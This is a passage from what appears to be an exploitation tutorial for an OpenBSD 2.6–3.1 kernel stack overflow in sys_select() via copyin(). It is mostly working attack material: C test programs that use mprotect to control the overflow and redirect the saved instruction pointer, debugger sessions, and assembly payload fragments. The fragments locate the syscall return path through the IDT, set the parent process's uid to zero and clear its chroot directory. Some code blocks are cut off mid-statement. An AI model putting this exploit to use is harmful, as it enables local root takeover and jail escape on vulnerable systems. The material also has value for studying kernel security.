[2]    movl    $_C_LABEL(copy_fault),PCB_ONFAULT(%eax)

Move _copy_fault's entry address into the process control block's
pcb_onfault member. This simply installs a special fault handler for
'protection', 'segment not present' and 'alignment' faults.  copyin()
installs its own fault handler, _copy_fault, we'll get back to this when
exploring the trap() code, since processor faults are handled there.

        movl    16(%esp),%esi
        movl    20(%esp),%edi
        movl    24(%esp),%eax

Move the incoming first, second and third arguments to %esi, %edi, %eax
respectively. %esi being the user land buffer, %edi the destination kernel
buffer and %eax the size.

        /*
         * We check that the end of the destination buffer is not past the
         * end of the user's address space.  If it's not, then we only need
         * to check that each page is readable, and the CPU will do that
         * for us.
         */
        movl    %esi,%edx
        addl    %eax,%edx

This addition operation is to verify if the user land address plus the size
(%eax) is in legal user land address space. The user land address is moved
to %edx and then added to the size (ubuf + size), which will point to the
supposed end of the user land buffer.

        jc      _C_LABEL(copy_fault)

This is a smart check to see if the previous addition operation has an
integer wrap-around issue. e.g: the user land address being 0x0ded and size
being 0xffffffff -- this unsigned arithmetic operation will wrap around and
the result is going to be 0x0dec. By design, the CPU will set the carry
flag on such a condition and the 'jc' (jump short if carry flag set)
instruction will take us to the _copy_fault function, which does some
clean up and returns EFAULT.

        cmpl    $VM_MAXUSER_ADDRESS,%edx
        ja      _C_LABEL(copy_fault)

Followed by the range check: whether or not the user land address plus size
is in valid user land address space range. A comparison is done against the
VM_MAXUSER_ADDRESS constant, which is the end of the user land stack
(0xdfbfe000 through obsd 2.6-3.1). If the sum (%edx) is above
VM_MAXUSER_ADDRESS 'ja' (jump above) instruction will make a short jump to
_copy_fault , eventually leading to the termination of the copy operation.

3:      /* bcopy(%esi, %edi, %eax); */

Clear the direction flag, DF = 0, means that the copy operation is going to
increment the index registers '%esi and %edi' .

        movl    %eax,%ecx
        shrl    $2,%ecx

Do the copy operation long at a time, from %esi to %edi .

        movb    %al,%cl
        andb    $3,%cl

Copy the remaining (size % 4) data, byte at a time.

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx, and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This means, the special fault handler is cleared from the

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        xorl    %eax,%eax

Do a return with a return value of zero: Success .


In the case of faults and failures in checks at copyin() this is where we

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This clears the special fault handler from the process.

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        movl    $EFAULT,%eax

Do a return with a return value of EFAULT (14): Failure .

After this long exploration of the copyin() function we'll just take a
brief look at trap() and check how pcb_onfault is implemented. trap() is
the main interface to exception, fault and trap handling of the BSD kernel.

trap.h:51:#define    T_PROTFLT        4      /* protection fault */
trap.h:63:#define    T_SEGNPFLT      16      /* segment not present fault */
trap.h:54:#define    T_ALIGNFLT       7      /* alignment fault */

        struct trapframe frame;
        register struct proc *p = curproc;
        int type = frame.tf_trapno;
        switch (type) {

line: 269

        case T_PROTFLT:
        case T_SEGNPFLT:
        case T_ALIGNFLT:
                /* Check for copyin/copyout fault. */
[1]             if (p && p->p_addr) {
[2]                     pcb = &p->p_addr->u_pcb;
[3]                     if (pcb->pcb_onfault != 0) {
[4]                             frame.tf_eip = (int)pcb->pcb_onfault;


Faults such as 'protection', 'segment not present' and 'alignment' are
handled all together, through a switch statement in the trap() code. The
appropriate case for the mentioned faults in trap() initially checks for
the existence of the process structure and the user structure [1], then
loads the process control block from the user structure [2] and checks
whether pcb_onfault is set [3]. If so, the instruction pointer (%eip) of
the control block is overwritten with the value of this special fault
handler [4]. After the process is context switched and given the cpu, it
will start running from the new handler code in kernel space. In the case
of copyin(), execution will be redirected to _copy_fault.

Armoured with all this knowledge, we can now provide a solution for the
'big size copyin()' problem.

--[ 3.1.1 - mprotect() 4 life!

x86 cpu memory operations such as trying to read from a write only (-w-)
page or trying to write to a read only (r--) or no access (---) page, and
some other combinations, will throw a protection fault which will be
handled by the trap() code as shown above.

This basic functionality will allow us to write as many bytes into kernel
space as we wish, no matter how big the size value actually is. As seen
above, the trap() code checks for pcb_onfault handler for protection faults
and redirects execution to it. In order to stop copying from user land to
kernel land, we will need to turn off the read protection bit of any
certain page following the overflow vector and achieve our goal.

|    rwx    | --> Dynamically allocated PAGE_SIZEd 
|           |     user land memory
|           |
|xxxxxxxxxxx| --> Overflow vector (fd_set array)
-------------     (saved %ebp, %eip overwrite values)
|    -w-    |
|           |
|           | --> Dynamically allocated PAGE_SIZEd 
|           |     consecutive memory, PROT_WRITE

The way to control the overflow as described in the diagram is to allocate
2 PAGE_SIZEd memory chunks and fill the end of the first page with overflow
data (exploitation vector) and then turn off the read protection bit of the
following page. 

At this stage we also run into another problem (albeit rather simple to
overcome). PAGE_SIZE is 4096 on x86 and 4096 bytes of overflowed stack will
crash the kernel at an earlier stage (before we take control).

Actually for this specific overflow the saved %ebp and saved %eip are 192
and 196 bytes away from the overflowed buffer, respectively. So, what we'll
do is allocate 2 pages and pass the fd_set pointer as 'second_page - 200'.
Then copyin() will start copying just 200 bytes before the end of the
readable page and will hit the non readable page right after. An exception
will be thrown and trap() will handle the fault as explained: the
'protection fault' handler will check pcb_onfault and set the instruction
pointer of the current PCB to the address of the handler, in this case
_copy_fault. _copy_fault will return EFAULT.

If we go back to the sys_select() code, the getbits() macro [4] will check
the return value and will go to the 'done' label on any value other than
success (0). At this point sys_select() sets the error code (errno) and
returns to syscall() (the syscall dispatcher).

Here is the test code to verify the mprotect technique:

#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

        char *buf;
	u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
	/* asking for 3 pages, just to be safe */
	if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0x41, pgsz*3); /* 0x41414141 ;) */

	buf = (char *) (((u_long) buf & ~pgsz) + pgsz);
	/* actually, we'r using the 2. and 3. pages*/

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
		perror("mprotect"); exit(-1);
	/* we set the 3rd page as WRITE only, 
	 * anything other than READ is fine 
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,

- The ddb> kernel debugger

To be able to debug the kernel we will need to set up the ddb kernel
debugger. Type the following commands to make sure ddb is set, and don't
forget that you should have some sort of console access to be able to
debug the kernel. (Physical access, console cable or those funky network
console devices...)

bash-2.05a# sysctl -w ddb.panic=1
ddb.panic: 1 -> 1
bash-2.05a# sysctl -w ddb.console=1
ddb.console: 1 -> 1

The first sysctl command configures ddb to kick in on kernel panics. The
latter will set up ddb accessible from console at any given time, with the
ESC+CTRL+ALT key combination.

There is no way to explore kernel vulnerabilities without many panic()s
getting in the way, so let's get dirty.

bash-2.05a# gcc -o test2 test2.c 
bash-2.05a# sync
bash-2.05a# sync
bash-2.05a# uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
bash-2.05a# ./test2
uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
kernel: page fault trap, code=0
Stopped at	0x41414141:uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e

ddb> trace
_kdb_trap(6,0,e462af08,1) at _kdb_trap+0xc1
_trap() at _trap+0x1b0
--- trap (number 6) ---

What all this means is that a page fault trap was taken for address
0x41414141 and, since this is an invalid address for kernel land, it could
not be paged in (like every illegal address reference), which led to a
panic(). This means we are on the right track and did indeed overwrite the
%eip, since an attempt was made to load the page 0x41414000 into memory.

Type the following for a clean reboot.
ddb> boot sync

Let's verify that we gain control by overwriting the %eip - here is how
to set the appropriate breakpoints:


ddb> x/i _sys_select,130
_sys_select:	pushl	%ebp
_sys_select+0x1:	movl	%esp,%ebp
_sys_select+0x424:	leave
_sys_select+0x425:	ret
_sys_select+0x426:	nop
ddb> break _sys_select+0x425
ddb> cont
^M	--> hit enter!

At this stage some other process might kick ddb> in because of its use of
the select syscall, just type 'cont' on the ddb> prompt and hit CR.

bash-2.05a# ./test2 
ddb> print $ebp
ddb> x/i $eip
_sys_select+0x425:	ret
ddb> x/x $esp
0xe461df3c:	41414141 --> saved instruction pointer!
ddb> boot sync

--[ 3.2 - Payload storage problem

The payload storage area for user land vulnerabilities is usually the
overflowed buffer itself (if it's big enough) or some other known user
controlled location such as environment variables, pre-overflow command
leftovers, etc, etc. In short, any user controlled memory that will stay
resident long enough to reference at a later time. Since the overflowed
buffer may be small in size, it is not always feasible to store the payload
there. Actually, for this specific buffer overflow, the contents of the
overflowed buffer get corrupted, leaving us no chance to return to it.
Also, we will need enough room to execute code in kernel space to be able
to do complex tasks, such as resetting the chroot pointers, altering pcred,
ucred and securelevel and resolving where to return to ... for all these
reasons we are going to execute the payload in the source buffer as opposed
to the destination (overflowed) buffer. This means we're going to jump to
the user land page, execute our payload and return back to our caller
transparently. This is all legitimate execution and we will have almost
unlimited space to execute our payload. In regards to the select()
overflow: copyin(ubuf, kbuf, big_num), we'll execute code inside 'ubuf'.

--[ 3.3 - Return to user land problem

After we gain control and execute our payload, we need to clean things up
and start our journey to user land, but this isn't as easy as it may sound.
My first approach was to do an 'iret' (return from interrupt) in the
payload after altering all necessary kernel structures, but this approach
turned out to be real painful. First of all, it's not an easy task to do
all the post-syscall handling done by the syscall() function. Also, the
trap() code for the kernel to user land transition can not be easily turned
into payload assembly code. However the most obvious reason not to choose
the 'iret' technique is that messing with important kernel primitives such
as locks, pending signals and/or mask-able interrupts is a really risky
job, thus drastically reducing the reliability of exploits and increasing
the potential for post exploitation kernel panics. So I chose to stay out
of it! ;)

The solution was obvious: after payload execution we should return to the
point in the syscall() handler where _sys_select() was supposed to return.
After that point, we don't need to care about any of the aforementioned
kernel primitives. This solution leads to the question of how to find out
where to return to, since we have overwritten the return address to gain
control, thus losing our caller's location. We will explore many of the
possible solutions in section 5, and usage of the idtr register for kernel
land address gathering will be introduced in section 5.2 for some serious
fun!! Let's get going ...

--[ 4 - Crafting the exploit

In this section, setting up proper breakpoints and calculating the
distance to the saved instruction pointer will be discussed. Also, a new
version of the test code will be presented in order to demonstrate that
execution can be successfully directed to the user land buffer.

--[ 4.1 - Breakpoints & Distance Calculation

bash-2.05a# nm /bsd | grep _sys_select
e045f58c T _linux_sys_select
e01c5a3c T _sys_select
bash-2.05a# objdump -d --start-address=0xe01c5a3c --stop-
>  /bsd | grep _copyin
e01c5b72:       e8 f9 a9 f3 ff          call   e0100570 <_copyin>
e01c5b9f:       e8 cc a9 f3 ff          call   e0100570 <_copyin>
e01c5bcc:       e8 9f a9 f3 ff          call   e0100570 <_copyin>
e01c5bf9:       e8 72 a9 f3 ff          call   e0100570 <_copyin>

The first copyin() is the one that copies the readfds and overflows the
kernel stack. That's the one we are after.

bash-2.05a# Stopped at _Debugger+0x4: leave
ddb> x/i 0xe01c5b72
_sys_select+0x136:	call	_copyin
ddb> break _sys_select+0x136
ddb> cont
bash-2.05a# ./test2
Breakpoint at	_sys_select+0x136:	call	_copyin
ddb> x/x $esp,3
0xe461de20:	5f38	e461de78	10000000

These are the 3 arguments pushed on the stack for copyin():
ubuf: 0x5f38 kbuf: 0xe461de78 len: 10000000

ddb> x/x 0x5f38
0x5f38:	41414141
ddb> x/x $ebp
0xe461df38:	e461dfa8	--> saved %ebp
ddb> ^M
0xe461df3c:	e02f34ce	--> saved %eip 

In the x86 calling convention, 2 longs just before the base pointer are the
saved eip (return address) and the saved ebp, respectively. To calculate
the distance between the stack buffer and the saved eip in ddb is done as

ddb> print 0xe461df3c - 0xe461de78
ddb> boot sync

The distance between the address of saved "return address" and the kernel
buffer is 196 (0xc4) bytes. Limiting our copyin() operation to 200 bytes
with the mprotect() technique will ensure a clean overflow.

--[ 4.2 - Return address overwrite & execution redirection

At this stage I'll introduce another test code to "verify" execution
redirection and usability of the user land buffer for payload execution.


#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

        char *buf;
        long *lptr;
        u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
        if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0xcc, pgsz*3); /* int3 */

        buf = (char *) (((u_long) buf & ~pgsz) + pgsz);

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
		perror("mprotect"); exit(-1);

        lptr = (long *) ((u_long)buf + pgsz - 8);
        *lptr++ = 0xbaddcafe; /* saved %ebp, does not 
			       * matter at this stage
        *lptr++ = (long) buf; /* overwrite the return addr 
			       * with buf's addr
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,

test3.c code will overwrite the saved ebp with 0xbaddcafe and the saved
instruction pointer with the address of the user land buffer, which is
filled with 'int 3''s (debug interrupts). This code should kick in the
kernel debugger.

bash-2.05a# gcc -o test3 test3.c
bash-2.05a# ./test3
Stopped at	0x5001:	int	$3
ddb> x/i $eip,2
0x5001:	int	$3
0x5002: int	$3
ddb> print $ebp
ddb> boot sync

Everything goes as planned, we successfully jump to user land and execute
code. Now we shall concentrate on other issues such as payload/shellcode
creation, symbol address gathering on run time, etc...

--[ 5 - How to gather offsets & symbol addresses

Before considering what to achieve with the kernel payload, I should remind
you of the question we raised earlier: how to return back to user land. The
proposed solution was basically to fix up %ebp, find out where the
syscall() handler is in memory, plus where in syscall() we should be
returning. The payload is the obvious place to do the mentioned fix-ups but
this brings the complication of how to gather kernel addresses. After
dealing with some insufficient pre-exploitation techniques such as 'nm
/bsd' and the kvm_open() and nlist() system interfaces, which all lack a
solution for a non-readable (in terms of fs permissions) kernel image
(/bsd), I came to the conclusion that all address gathering should be done
at run time (in the execution state of the payload). Many win32 folks have
been doing this type of automation in shellcodes by walking through the
thread environment block (TEB) for some time. Also kernel structures such
as the process structure have to be supplied to the payload in order to
achieve our goals. The following sections introduce the proposed solutions
for kernel space address gathering.

--[ 5.1 - sysctl() syscall

sysctl() system call will enable us to gather process structure information
which is needed for the credential and chroot manipulation payloads. In
this section we will take a brief look into the internals of the sysctl()

sysctl is a system call to get and set kernel level information from user
land. It has a good interface to pass data from kernel to user land and
back. The sysctl interface is structured into several sub components such
as the kernel, hardware, virtual memory, net, filesystem and architecture
system control interfaces. We'll concentrate on the kernel sysctl's, which
are handled by the kern_sysctl() function. See: sys/kern/kern_sysctl.c:234
The kern_sysctl() function also assigns different handlers to certain
queries such as proc structure, clockrate, vnode and file information. The
process structure is handled by the sysctl_doproc() function and this is
the interface to kernel land information that we are after!

sysctl_doproc(name, namelen, where, sizep)
        int *name;
        u_int namelen;
        char *where;
        size_t *sizep;


[1] for (; p != 0; p = LIST_NEXT(p, p_list)) {

[2]        switch (name[0]) {

                case KERN_PROC_PID:
                        /* could do this with just a lookup */
[3]                     if (p->p_pid != (pid_t)name[1])



                if (buflen >= sizeof(struct kinfo_proc)) {
[4]                     fill_eproc(p, &eproc);
[5]                     error = copyout((caddr_t)p, &dp->kp_proc,
                                        sizeof(struct proc));

fill_eproc(p, ep)
        register struct proc *p;
        register struct eproc *ep;
        register struct tty *tp;

[6]        ep->e_paddr = p;

Also for sysctl_doproc() there can be different types of queries, which are
handled by the switch [2] statement. KERN_PROC_PID is the query that is
sufficient to gather the needed address of any process's proc structure.
For the select() overflow it was sufficient just to gather the parent
process's proc address, but the setitimer() vulnerability makes use of the
sysctl() interface in many different ways (more on this

The sysctl_doproc() code iterates through [1] the linked list of proc
structures in order to find the queried pid [3], and, if found, certain
structures (eproc & kp_proc) get filled in [4], [5] and copied out to user
land. fill_eproc() (called from [4]) does the trick [6] and copies the
proc address of the queried pid into the e_paddr member of the eproc
structure, which, in turn, is eventually copied out to user land in the
kinfo_proc structure (which is the main data structure for the
sysctl_doproc() function). For further information on members of these
structures see: sys/sys/sysctl.h.

The following is the function we'll be using to retrieve the kinfo_proc

get_proc(pid_t pid, struct kinfo_proc *kp)
   u_int arr[4], len;
        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {

It is a pretty straightforward interface, what happens is:

     - CTL_KERN will be dispatched to kern_sysctl() by sys_sysctl()
     - KERN_PROC will be dispatched to sysctl_doproc() by kern_sysctl()
     - KERN_PROC_PID will be handled by the aforementioned switch
       statement, eventually returning the kinfo_proc

The sysctl() system call might be there with all good intentions such as
getting and setting kernel information in a dynamic fashion. However, from
a security point of view, I believe the sysctl() syscall should not be
blindly giving proc information about any queried pid. Credential checks
should be added in proper places, especially for the sysctl_doproc()
interface ...

--[ 5.2 - sidt technique & _kernel_text search

As mentioned before, we are after transparent payload execution so that
_sys_select() will actually return to its caller _syscall() as expected.  I
will explain how to gather the return path in this section. The solution
depends on the idtr (interrupt descriptor table register) that contains a
fixed location address, which is the start of the Interrupt Descriptor
Table (IDT).

Without going into too many details, IDT is the table that holds the
interrupt handlers for various interrupt vectors. Each interrupt in x86 is
represented by a number in the range 0 - 255 and these numbers are called
the interrupt vectors. These vectors are used to locate the initial handler
for any given interrupt inside the IDT. IDT contains 256 entries, each
being 8 bytes. IDT descriptor entries can be 3 different types but we will
concentrate only on the gate descriptor:


struct gate_descriptor {
        unsigned gd_looffset:16;        /* gate offset (lsb) */
        unsigned gd_selector:16;        /* gate segment selector */
        unsigned gd_stkcpy:5;           /* number of stack wds to cpy */
        unsigned gd_xx:3;               /* unused */
        unsigned gd_type:5;             /* segment type */
        unsigned gd_dpl:2;              /* segment descriptor priority 
level */
        unsigned gd_p:1;                /* segment descriptor present */
        unsigned gd_hioffset:16;        /* gate offset (msb) */

gate_descriptor's members gd_looffset and gd_hioffset will form the low
level interrupt handler's address. For more information on the various
fields, the reader should consult the architecture manuals [Intel].

System call interface to request kernel services is implemented through the
software initiated interrupt: 0x80. Armored with this knowledge, starting
from the address of the low level syscall interrupt handler and walking
through the kernel text, we can find our way to the high level syscall
handler and finally return to it. 

The interrupt descriptor table under OpenBSD is named _idt_region and slot
number 0x80 is the gate descriptor for the system call interrupt 'int
0x80'. Since every entry is 8 bytes, the system call gate_descriptor is at
address '_idt_region + 0x80 * 0x8' which is '_idt_region + 0x400'.

bash-2.05a# Stopped at		_Debugger+0x4: leave
ddb> x/x _idt_region+0x400
_idt_region+0x400:	80e4c
ddb> ^M
_idt_region+0x404:	e010ef00

To figure out the initial syscall handler we need to do the proper 'shift'
and 'or' operations on the gate descriptor bit fields, which leads to the
0xe0100e4c kernel address.
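The 'shift' and 'or' step can be written out as a decoder for the two 32-bit words shown in the ddb output above. This is an added example, not code from the original article: the struct, function names and the sanity check (of the kind an IDT integrity checker would apply to the syscall gate) are assumptions, and the bit positions follow the gate_descriptor bit fields quoted above as laid out on little-endian x86.

```c
#include <stdint.h>
#include <stdio.h>

#define GATE_TYPE_INT32  0x0e   /* 32-bit interrupt gate */
#define GATE_TYPE_TRAP32 0x0f   /* 32-bit trap gate */

/* Decoded view of one 8-byte IDT gate descriptor (hypothetical helper). */
struct gate_fields {
    uint16_t looffset;  /* gd_looffset: handler address bits 0..15 */
    uint16_t selector;  /* gd_selector: code segment selector */
    uint8_t  stkcpy;    /* gd_stkcpy */
    uint8_t  type;      /* gd_type */
    uint8_t  dpl;       /* gd_dpl: lowest privilege allowed to invoke */
    uint8_t  present;   /* gd_p */
    uint16_t hioffset;  /* gd_hioffset: handler address bits 16..31 */
    uint32_t handler;   /* (hioffset << 16) | looffset */
};

/* Byte offset of a vector's descriptor inside the IDT: 8 bytes per slot. */
static uint32_t idt_slot_offset(uint8_t vector)
{
    return (uint32_t)vector * 8u;
}

/* w0 is the dword at the slot, w1 the dword at slot + 4. */
static struct gate_fields decode_gate(uint32_t w0, uint32_t w1)
{
    struct gate_fields g;

    g.looffset = (uint16_t)(w0 & 0xffffu);
    g.selector = (uint16_t)(w0 >> 16);
    g.stkcpy   = (uint8_t)(w1 & 0x1fu);
    g.type     = (uint8_t)((w1 >> 8) & 0x1fu);
    g.dpl      = (uint8_t)((w1 >> 13) & 0x3u);
    g.present  = (uint8_t)((w1 >> 15) & 0x1u);
    g.hioffset = (uint16_t)(w1 >> 16);
    g.handler  = ((uint32_t)g.hioffset << 16) | g.looffset;
    return g;
}

/* Sanity check for a system call gate: present, a 32-bit interrupt or
 * trap gate, invocable from ring 3, and a ring 0 selector in the GDT. */
static int gate_sane_for_syscall(struct gate_fields g)
{
    int rpl = g.selector & 0x3;
    int in_ldt = (g.selector >> 2) & 0x1;

    if (!g.present)
        return 0;
    if (g.type != GATE_TYPE_INT32 && g.type != GATE_TYPE_TRAP32)
        return 0;
    if (g.dpl != 3)
        return 0;
    return rpl == 0 && !in_ldt;
}

int main(void)
{
    /* The two words printed by ddb at _idt_region+0x400 and +0x404. */
    struct gate_fields g = decode_gate(0x00080e4cu, 0xe010ef00u);

    printf("slot offset for vector 0x80: 0x%x\n",
           (unsigned)idt_slot_offset(0x80));
    printf("selector=0x%04x type=0x%02x dpl=%u present=%u\n",
           (unsigned)g.selector, (unsigned)g.type,
           (unsigned)g.dpl, (unsigned)g.present);
    printf("handler=0x%08x sane=%d\n",
           (unsigned)g.handler, gate_sane_for_syscall(g));
    return 0;
}
```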

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/x 0xe0100e4c
_Xosyscall_end:	pushl	$0x2
ddb> ^M
_Xosyscall_end+0x2:	pushl	$0x3
_Xosyscall_end+0x20:	call	_syscall

For each exception or software initiated interrupt, the corresponding
vector is found in the IDT and execution is redirected to the handler
gathered from the gate descriptor. This is an intermediate handler and will
eventually take us to the real handler. As seen in the kernel debugger
output, the initial handler _Xosyscall_end saves all registers (also some
other low level stuff) and immediately calls the real handler, which is
_syscall().

We have mentioned that the idtr register always contains the address of the
_idt_region, here is the way to access its content:

sidt 0x4(%edi)
mov  0x6(%edi),%ebx  

Address of the _idt_region is moved to ebx and IDT can now be referenced
via ebx. Assembly code to gather the syscall handler starting from the
initial handler is as follows;

sidt 0x4(%edi)
mov  0x6(%edi),%ebx     # mov _idt_region is in ebx
mov  0x400(%ebx),%edx   # _idt_region[0x80 * (2*sizeof long) = 0x400]
mov  0x404(%ebx),%ecx   # _idt_region[0x404]
shr  $0x10,%ecx	        #
sal  $0x10,%ecx	        # ecx = gd_hioffset
sal  $0x10,%edx	        #
shr  $0x10,%edx         # edx = gd_looffset
or   %ecx,%edx          # edx = ecx | edx  =  _Xosyscall_end

At this stage we have successfully found the initial/intermediate handler's
location, so the next step is to search through the kernel text, find 'call
_syscall', gather the displacement of the call instruction and add it to
the address of the instruction's location. In addition, 5 must be added to
the displacement to account for the size of the call instruction.

xor  %ecx,%ecx          # zero out the counter
inc  %ecx
movb (%edx,%ecx),%bl    # bl =  _Xosyscall_end++
cmpb $0xe8,%bl          # if bl == 0xe8 : 'call'
jne  up

lea  (%edx,%ecx),%ebx   # _Xosyscall_end+%ecx: call _syscall
inc  %ecx
mov  (%edx,%ecx),%ecx   # take the displacement of the call ins.
add  $0x5,%ecx          # add 5 to displacement
add  %ebx,%ecx          # ecx = _Xosyscall_end+0x20 + disp = _syscall()

At this stage %ecx holds the address of the real handler _syscall(). The
next step is to find out where to return inside the syscall() function
which eventually leads to a broader research on various versions of OpenBSD
with various kernel compilation options. Luckily, it turns out to be safe
to search for the 'call *%eax' instruction inside the _syscall(), because
this turns out to be the instruction that dispatches every system call to
its final handler in every OpenBSD version I have tested.

From OpenBSD 2.6 through 3.1, kernel code always dispatched the system
calls with the 'call *%eax' instruction, which is unique in the scope of
the _syscall() function.

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/i _syscall+0x240
_syscall+0x240:	call	*%eax

Our goal is now to figure out the offset (0x240 in the above disasm) for
any kernel version so that we can return to the instruction just after it
from our payload and achieve our goal. The code to search for 'call *%eax'
is as follows:

# _syscall+0x240: ff
# _syscall+0x241: d0    0x240->0x241 OBSD3.1

mov  %ecx,%edi         # ecx is the addr of _syscall 
movw $0xd0ff,%ax       # search for ffd0 'call *%eax'
mov  $0xffffffff,%ecx
scasw                  # scan (%edi++) for %ax

# %edi gets incremented one last time before breaking the loop
# %edi contains the instruction address just after 'call *%eax' 
# so return to it!!!

xor  %eax,%eax         #set up the return value = Success ;)

push %edi              # push %edi on the stack and return to it

Finally, this is all we needed for a clean return. This payload can be used
for any syscall overflow without requiring any further modification.

--[ 5.3 - _db_lookup() technique 

This technique introduces no new concepts; it is just another kernel text
search to find out the address of _db_lookup() -- the kernel land
equivalent of dlsym(). The search is based on the function fingerprint,
which is fairly safe on the recent versions on which the code has been
developed, but it might not work on the older versions. I chose to keep it
out of the text for brevity's sake but it's exactly the same 'repnz scas'
concept just used in the idtr technique. (for sample code, contact me.)

--[ 5.4 - /usr/bin/nm, kvm_open(), nlist()

/usr/bin/nm, the kvm library and the nlist() library interface can all be
used to gather kernel land symbols and offsets but, as we already
mentioned, they all require a readable kernel image and/or additional
privileges, which in most secured systems are not usually available.

Furthermore, the most obvious problem with these interfaces is that they
won't work at all in chroot()ed environments with no privileges (nobody).
These are the main reasons I have not used these techniques within the
exploitation phase of privilege escalation and chroot breaking, but after
establishing full control over the system (uid = 0 and out of jail), I have
made use of offline binary symbol gathering in order to reset the
securelevel; more about this later.

--[ 5.5 - %ebp fixup

After taking care of the saved return address, we need to fix %ebp to
prevent crashes in later stages (especially in _syscall() code). The proper
way to calculate %ebp is to find out the difference between the stack
pointer and the saved base pointer at the procedure exit and use this
static number to restore %ebp. For all the versions of OpenBSD 2.6 through
3.1 this difference was 0x68 bytes. You can simply set a breakpoint on the
_sys_select prolog and another one just before the 'leave' instruction at
the epilog and calculate the difference between the %ebp recorded at the
prolog and the %esp recorded just before the epilog.

lea  0x68(%esp),%ebp # fixup ebp

The above instruction is enough to set %ebp back to its old value.

--[ 6 - Payload/Shellcode Creation

In the following sections we'll develop small payloads that modify certain
fields of their parent process' proc structure to achieve elevated
privileges and break out of chroot/jail environments. Then, we'll chain the
developed assembly code with the sidt code to work our way back to user
land and enjoy our new privileges.

--[ 6.1 - What to achieve

Setting up a jail with nobody privileges and trying to break out of it
seems like a fairly good goal to achieve. Since all these privilege
separation terms are brought into OpenBSD with the latest OpenSSH, it would
be nice to actually demonstrate how trivial it would be to bypass this kind
of 'protection' by way of such kernel level vulnerabilities.

Certain inetd.conf services and OpenSSH are run as nobody/user in a
chrooted/jailed environment -- intended to be an additional assurance of
security. This is a totally false sense of security; jailme.c code follows:


#include <stdio.h>

        setgroups(NULL, NULL);
        execl("/bin/sh", "jailed", NULL);

bash-2.05a# gcc -o jailme jailme.c
bash-2.05a# cp jailme /tmp/jailme
bash-2.05a# mkdir /var/tmp/jail
bash-2.05a# mkdir /var/tmp/jail/usr
bash-2.05a# mkdir /var/tmp/jail/bin /var/tmp/jail/usr/lib
bash-2.05a# mkdir /var/tmp/jail/usr/libexec
bash-2.05a# cp /bin/sh /var/tmp/jail/bin/
bash-2.05a# cp /usr/bin/id /var/tmp/jail/bin/
bash-2.05a# cp /bin/ls /var/tmp/jail/bin/
bash-2.05a# cp /usr/lib/ /var/tmp/jail/usr/lib/
bash-2.05a# cp /usr/libexec/ /var/tmp/jail/usr/libexec/
bash-2.05a# cat >> /etc/inetd.conf 
1024            stream  tcp     nowait  root    /tmp/jailme
bash-2.05a# ps aux | grep inetd
root     19121  0.0  1.1   148   352 p0  S+     8:19AM    0:00.05 grep 
root     27152  0.0  1.1    64   348 ??  Is     6:00PM    0:00.08 inetd 
bash-2.05a# kill -HUP 27152
bash-2.05a# nc -v localhost 1024
Connection to localhost 1024 port [tcp/*] succeeded!
ls -l /
total 4
drwxr-xr-x  2 0  0  512 Dec  9 16:23 bin
drwxr-xr-x  4 0  0  512 Dec  9 16:21 usr
uid=32767 gid=32767
jailed: <stdin>[4]: ps: not found

--[ 6.2 - The payload

Throughout this section we will introduce all the tiny bits of the complete
payload. All these sections chained together will form the eventual
payload, which will be available in the code section (10) of this paper.

--[ 6.2.1 - p_cred & u_cred

We'll start with the privilege elevation section of the payload. Following
is the payload to update ucred (credentials of user) and pcred (credentials
of the process) of any given proc structure. The exploit code fills in the
proc address of its parent process by using the sysctl() system call
(discussed in 5.1), replacing .long 0x12345678. The following 'call' and
'pop' instructions will load the address of the given proc structure
address into %edi. This is the typical address gathering technique used in
almost every PIC shellcode [ALEPH1].

call moo
.long 0x12345678   <-- pproc addr
.long 0xdeadcafe
.long 0xbeefdead
pop  %edi
mov  (%edi),%ecx      # parent's proc addr in ecx

		      # update p_ruid
mov  0x10(%ecx),%ebx  # ebx = p->p_cred
xor  %eax,%eax        # eax = 0
mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0

	              # update cr_uid
mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred
mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0

--[ 6.2.2 - chroot breaking

Next tiny assembly fragment will be the chroot breaker of our complete

Without going into extra detail (time is running out, deadline is within 3
days ;)), let's take a brief look at how chroot is checked on a per-process
basis. chroot jails are implemented by filling in the fd_rdir member of the
filedesc (open files structure) with the desired jail directory's vnode
pointer. When the kernel is giving certain services to any process, it
checks for the existence of this pointer, and if it's filled with a vnode
that process is handled slightly differently and the kernel will create the
notion of a new root directory for this process, thus jailing it into a
predefined directory. For a regular process this pointer is zero / unset.
So without any further need to go into implementation level details, just
setting this pointer to NULL means FREEDOM! fd_rdir is referenced through
the proc structure as follows:


As with the credentials structure, filedesc is also trivial to access and
alter, with only 2 instruction additions to our payload.

# update p->p_fd->fd_rdir to break chroot()

